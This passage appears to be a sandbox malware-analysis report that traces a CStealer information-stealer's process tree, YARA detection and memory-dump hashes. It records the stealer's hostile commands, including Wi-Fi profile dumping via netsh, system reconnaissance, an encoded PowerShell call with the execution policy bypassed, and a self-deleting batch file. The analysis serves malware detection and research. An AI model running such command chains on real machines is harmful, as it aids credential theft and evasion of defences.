                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:68
                                                                                                                                                          Start time:17:47:38
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\tree.com
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:tree /A /F
                                                                                                                                                          Imagebase:0x7ff6daff0000
                                                                                                                                                          File size:20'992 bytes
                                                                                                                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:69
                                                                                                                                                          Start time:17:47:38
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:systeminfo
                                                                                                                                                          Imagebase:0x7ff697450000
                                                                                                                                                          File size:110'080 bytes
                                                                                                                                                          MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:70
                                                                                                                                                          Start time:17:47:38
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\netsh.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:netsh wlan show profile
                                                                                                                                                          Imagebase:0x7ff6f3710000
                                                                                                                                                          File size:96'768 bytes
                                                                                                                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:71
                                                                                                                                                          Start time:17:47:40
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:72
                                                                                                                                                          Start time:17:47:40
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:73
                                                                                                                                                          Start time:17:47:40
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                                                                                                                                          Imagebase:0x7ff6957e0000
                                                                                                                                                          File size:8'870'956 bytes
                                                                                                                                                          MD5 hash:BC2B7DE582FB94F0C44855D8FAB8C236
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:74
                                                                                                                                                          Start time:17:47:40
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:75
                                                                                                                                                          Start time:17:47:41
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:76
                                                                                                                                                          Start time:17:47:41
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:77
                                                                                                                                                          Start time:17:47:41
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:78
                                                                                                                                                          Start time:17:47:41
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\tree.com
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:tree /A /F
                                                                                                                                                          Imagebase:0x7ff6daff0000
                                                                                                                                                          File size:20'992 bytes
                                                                                                                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:79
                                                                                                                                                          Start time:17:47:42
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64-encoded command blob removed]
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:80
Start time:17:47:42
Start date:09/05/2024
Path:C:\ProgramData\svchost.exe
Wow64 process (32bit):false
Commandline:"C:\ProgramData\svchost.exe"
Imagebase:0x7ff6fb680000
File size:12'576'970 bytes
MD5 hash:48B277A9AC4E729F9262DD9F7055C422
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:81
Start time:17:47:42
Start date:09/05/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff704450000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:82
Start time:17:47:42
Start date:09/05/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:84
Start time:17:47:42
Start date:09/05/2024
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff6daff0000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:85
Start time:17:47:42
Start date:09/05/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:0x7ff704450000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:86
Start time:17:47:43
Start date:09/05/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:87
Start time:17:47:43
Start date:09/05/2024
Path:C:\Windows\System32\getmac.exe
Wow64 process (32bit):false
Commandline:getmac
Imagebase:0x7ff6e2970000
File size:90'112 bytes
MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:88
Start time:17:47:43
Start date:09/05/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat
Imagebase:0x7ff704450000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:89
Start time:17:47:43
Start date:09/05/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:90
Start time:17:47:43
Start date:09/05/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:Tasklist /fi "PID eq 7796"
Imagebase:0x7ff6ae0f0000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:91
Start time:17:47:44
Start date:09/05/2024
Path:C:\Windows\System32\find.exe
Wow64 process (32bit):false
Commandline:find ":"
Imagebase:0x7ff6e8cf0000
File size:17'920 bytes
MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:92
Start time:17:47:44
Start date:09/05/2024
Path:C:\Users\user\AppData\Local\Temp\cstealer.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
Imagebase:0x7ff6957e0000
File size:8'870'956 bytes
MD5 hash:BC2B7DE582FB94F0C44855D8FAB8C236
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 0000005C.00000003.2565952065.00000239F3175000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:false

Target ID:93
Start time:17:47:44
Start date:09/05/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff704450000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:94
                                                                                                                                                          Start time:17:47:44
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:95
                                                                                                                                                          Start time:17:47:44
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\tree.com
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:tree /A /F
                                                                                                                                                          Imagebase:0x7ff6daff0000
                                                                                                                                                          File size:20'992 bytes
                                                                                                                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:96
                                                                                                                                                          Start time:17:47:44
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:157
                                                                                                                                                          Start time:17:47:57
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:
                                                                                                                                                          Has administrator privileges:
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:165
                                                                                                                                                          Start time:17:47:59
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:
                                                                                                                                                          Has administrator privileges:
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:261
                                                                                                                                                          Start time:17:48:13
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:
                                                                                                                                                          Has administrator privileges:
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:265
                                                                                                                                                          Start time:17:48:13
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:
                                                                                                                                                          Has administrator privileges:
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:309
                                                                                                                                                          Start time:17:48:20
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:
                                                                                                                                                          Has administrator privileges:
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:373
                                                                                                                                                          Start time:17:48:32
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:
                                                                                                                                                          Has administrator privileges:
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

Memory Dump Source
• Source File: 00000000.00000002.2187386489.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_DevxExecutor.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3432a9f3d87ea24803b3302ea2303704b4f70038e8d412e7e7c68e8b4ec657ee
• Instruction ID: 0f55fa37c337057488877190de8cecc0f2bb60ca7748a02de0107903569c428b
• Opcode Fuzzy Hash: 3432a9f3d87ea24803b3302ea2303704b4f70038e8d412e7e7c68e8b4ec657ee
• Instruction Fuzzy Hash: DDD19130A189198FEB99FB28C458ABD73E2FF99355F114579E81EC32D6DF28A8418740
Strings
Memory Dump Source
• Source File: 00000000.00000002.2187386489.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_DevxExecutor.jbxd
Similarity
• API ID:
• String ID: 3CP_^
• API String ID: 0-4258787611
• Opcode ID: 3d298369c940e40ed948e7b7cd02ceaa19c9d6d41149275983bff872f88a5046
• Instruction ID: 53a965fd080a0f5064e24dd21540dbc5aab2c9d2a9287780cfd0011ba3ac0ab5
• Opcode Fuzzy Hash: 3d298369c940e40ed948e7b7cd02ceaa19c9d6d41149275983bff872f88a5046
• Instruction Fuzzy Hash: A431E53191E6968EEB56B77844116FD7BA0EF87388F0404BAE44EC71D3DF2D680583A6
Memory Dump Source
• Source File: 00000000.00000002.2187386489.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_DevxExecutor.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3868b5802274be7bb02ccb2ee41ccdec7cc784c5a75323cc4859d3d698246bcb
• Instruction ID: d997347240722da98e92bf4c9734dbf311610fefb0a21800e12378530913dba3
• Opcode Fuzzy Hash: 3868b5802274be7bb02ccb2ee41ccdec7cc784c5a75323cc4859d3d698246bcb
• Instruction Fuzzy Hash: 6941F631E2DA854FE35AEF3C58693B57BE1FF5A250F0801BAD048C72D3EE2858448356
Memory Dump Source
• Source File: 00000000.00000002.2187386489.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f00000_DevxExecutor.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ec7e299c356cc2afb60cddd03697bed5f74036211e14c9c9d41a94a18d9795c3
• Instruction ID: 9f5cc07a9af89935996a2906e1bd5e0f0f4af60f5b51bdfffb73798fca4b83fb
• Opcode Fuzzy Hash: ec7e299c356cc2afb60cddd03697bed5f74036211e14c9c9d41a94a18d9795c3
• Instruction Fuzzy Hash: 63A1C131E2CA498FE799EF2C545A3B9B7D2FF99250F48017AD00DC32C2EF2898858355
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2187386489.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_DevxExecutor.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 2b65f955b1490da236540dcce6f1e1fcdb2376b3bc842d51778294417d6ad0d2
                                                                                                                                                            • Instruction ID: 45974d59bdd921d2a6bceab81238bd82200be1fd5a9e534551fd5a25374fcefd
                                                                                                                                                            • Opcode Fuzzy Hash: 2b65f955b1490da236540dcce6f1e1fcdb2376b3bc842d51778294417d6ad0d2
                                                                                                                                                            • Instruction Fuzzy Hash: 1F51B171F2CA494FE788EF2C545A3B9A7D2FF99690F440579D40EC32C2EF2898868355
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2187386489.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_DevxExecutor.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 52fe583245de9047dcefe1038699920711022bcf974880197447543b217d7154
                                                                                                                                                            • Instruction ID: fc0f446a1940cc502fa18b449bba1c8594ee8132f394b61c581e9de76c4cddb7
                                                                                                                                                            • Opcode Fuzzy Hash: 52fe583245de9047dcefe1038699920711022bcf974880197447543b217d7154
                                                                                                                                                            • Instruction Fuzzy Hash: E411C272E19A4C9FCB54FF6898491ED7BE0FF59355F4002ABE418C7182EB38DA148B85
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2187386489.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_DevxExecutor.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4965d82fb709c795bffd79a12fe5a7b7aa73a342cb317cb044409b3f70736a85
                                                                                                                                                            • Instruction ID: 900e9b4213c356e9e9e435e2c14e6767bb4737a9583f894c96e8e7f6a913fb59
                                                                                                                                                            • Opcode Fuzzy Hash: 4965d82fb709c795bffd79a12fe5a7b7aa73a342cb317cb044409b3f70736a85
                                                                                                                                                            • Instruction Fuzzy Hash: 44014922F1DD490FF398FB7868696F4A7D1EBAA251B0502BAD00DC32D7ED0858428350
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2187386489.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_DevxExecutor.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 0c33be56bdf261108ddbb4c397669430fde631d0eb4ada8935427aaaa1c56d82
                                                                                                                                                            • Instruction ID: 7121857f9119318d2754153781a79e00213308427b7b920a7ebea845db2d1cfe
                                                                                                                                                            • Opcode Fuzzy Hash: 0c33be56bdf261108ddbb4c397669430fde631d0eb4ada8935427aaaa1c56d82
                                                                                                                                                            • Instruction Fuzzy Hash: B8F0C822F1DD091FF7A8BA6D28997B993D1EBED291B510179E00DC32CAFD185C828354
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2187386489.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_DevxExecutor.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 93a319f2945d4d4ba3e23f725a26caea31f57afc14414f232302e1898f92d310
                                                                                                                                                            • Instruction ID: 107b124f9b5842f9ec9117c12ca14d67a02ba44164ccb4b40e4bbfcb8332e439
                                                                                                                                                            • Opcode Fuzzy Hash: 93a319f2945d4d4ba3e23f725a26caea31f57afc14414f232302e1898f92d310
                                                                                                                                                            • Instruction Fuzzy Hash: C6F02D31E0CB414FE395B72888565797BE1EF96350F4905BAD848C71E6FE1C99854341

Execution Graph

Execution Coverage: 1.8%
Dynamic/Decrypted Code Coverage: 10.2%
Signature Coverage: 5.4%
Total number of Nodes: 900
Total number of Limit Nodes: 42
88354->88237 88354->88238 88356 7ff6957e4af1 88355->88356 88359 7ff6957e4a94 88355->88359 88393 7ff6957e45d0 57 API calls __std_exception_destroy 88356->88393 88358 7ff6957e4b01 88358->88245 88361 7ff6957e4adc 88359->88361 88392 7ff6957e45d0 57 API calls __std_exception_destroy 88359->88392 88361->88245 88363 7ff6957e4960 88362->88363 88364 7ff6957e1ee0 49 API calls 88363->88364 88365 7ff6957e49ac 88364->88365 88366 7ff6957e1ee0 49 API calls 88365->88366 88375 7ff6957e4a26 __std_exception_destroy 88365->88375 88367 7ff6957e49e7 88366->88367 88370 7ff6957e8de0 57 API calls 88367->88370 88367->88375 88368 7ff6957ec010 _wfindfirst32i64 8 API calls 88369 7ff6957e4a6d 88368->88369 88369->88254 88369->88255 88371 7ff6957e49fd 88370->88371 88372 7ff6957e8de0 57 API calls 88371->88372 88373 7ff6957e4a14 88372->88373 88374 7ff6957e8de0 57 API calls 88373->88374 88374->88375 88375->88368 88377 7ff6957e480a 88376->88377 88378 7ff6957e8de0 57 API calls 88377->88378 88379 7ff6957e4812 __std_exception_destroy 88377->88379 88378->88377 88379->88258 88380->88242 88381->88242 88382->88242 88383->88242 88384->88242 88385->88242 88386->88242 88387->88242 88388->88266 88389->88267 88390->88242 88391->88346 88392->88361 88393->88358 88394->88274 88395->88275 88396->88281 88397->88280 88399 7ff6957e10a6 88398->88399 88400 7ff6957e10d3 88399->88400 88401 7ff6957e10ad 88399->88401 88404 7ff6957e10ed 88400->88404 88405 7ff6957e1109 88400->88405 88424 7ff6957e2b10 59 API calls 2 library calls 88401->88424 88403 7ff6957e10c0 88403->88307 88425 7ff6957e2870 59 API calls 3 library calls 88404->88425 88407 7ff6957e111b 88405->88407 88414 7ff6957e1137 memcpy_s 88405->88414 88426 7ff6957e2870 59 API calls 3 library calls 88407->88426 88409 7ff6957f0ccc _fread_nolock 53 API calls 88409->88414 88410 7ff6957f0a40 37 API calls 88410->88414 88411 7ff6957e1104 __std_exception_destroy 88411->88307 88412 7ff6957e11fe 88427 7ff6957e2b10 59 API calls 2 library calls 88412->88427 88414->88409 88414->88410 
